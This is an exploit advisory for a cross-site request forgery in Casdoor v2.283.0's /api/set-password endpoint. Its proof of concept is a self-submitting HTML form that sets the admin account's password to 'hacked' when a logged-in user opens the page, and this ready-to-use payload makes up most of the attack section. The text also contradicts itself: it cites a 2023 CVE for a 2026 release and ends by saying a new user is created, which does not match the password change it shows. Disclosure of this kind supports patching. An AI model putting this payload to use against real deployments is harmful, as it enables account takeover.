📄 Casdoor 2.283.0 Cross Site Request Forgery

# Exploit Title: Casdoor v2.283.0 (2026-02-02) - Cross-Site Request Forgery (CSRF) 
    # Application: Casdoor
    # Version: v2.283.0
    # Date: 03/02/2026
    # Exploit Author: Van Lam Nguyen
    # Facebook: vanlam1412
    # Vendor Homepage: https://casdoor.org/
    # Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v2.283.0.zip
    # Tested on: Windows
    # CVE: CVE-2023-34927 ( latest yet to be assigned)
    # POC: https://github.com/vanlam2001/csrf_casdoor
    
    Overview
    ==================================================
    Casdoor v2.283.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. 
    This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
    
    Proof of Concept
    ==================================================
    
    Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
    
    <html>
    <form action="http://localhost:8000/api/set-password" method="POST">
        <input name='userOwner' value='built&#45;in' type='hidden'>
        <input name='userName' value='admin' type='hidden'>
        <input name='newPassword' value='hacked' type='hidden'>
        <input type=submit>
    </form>
    <script>
        history.pushState('', '', '/');
        document.forms[0].submit();
    </script>
    
    </html>
    
    If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
    
    userOwner: built&#45;in
    userName: admin
    newPassword: hacked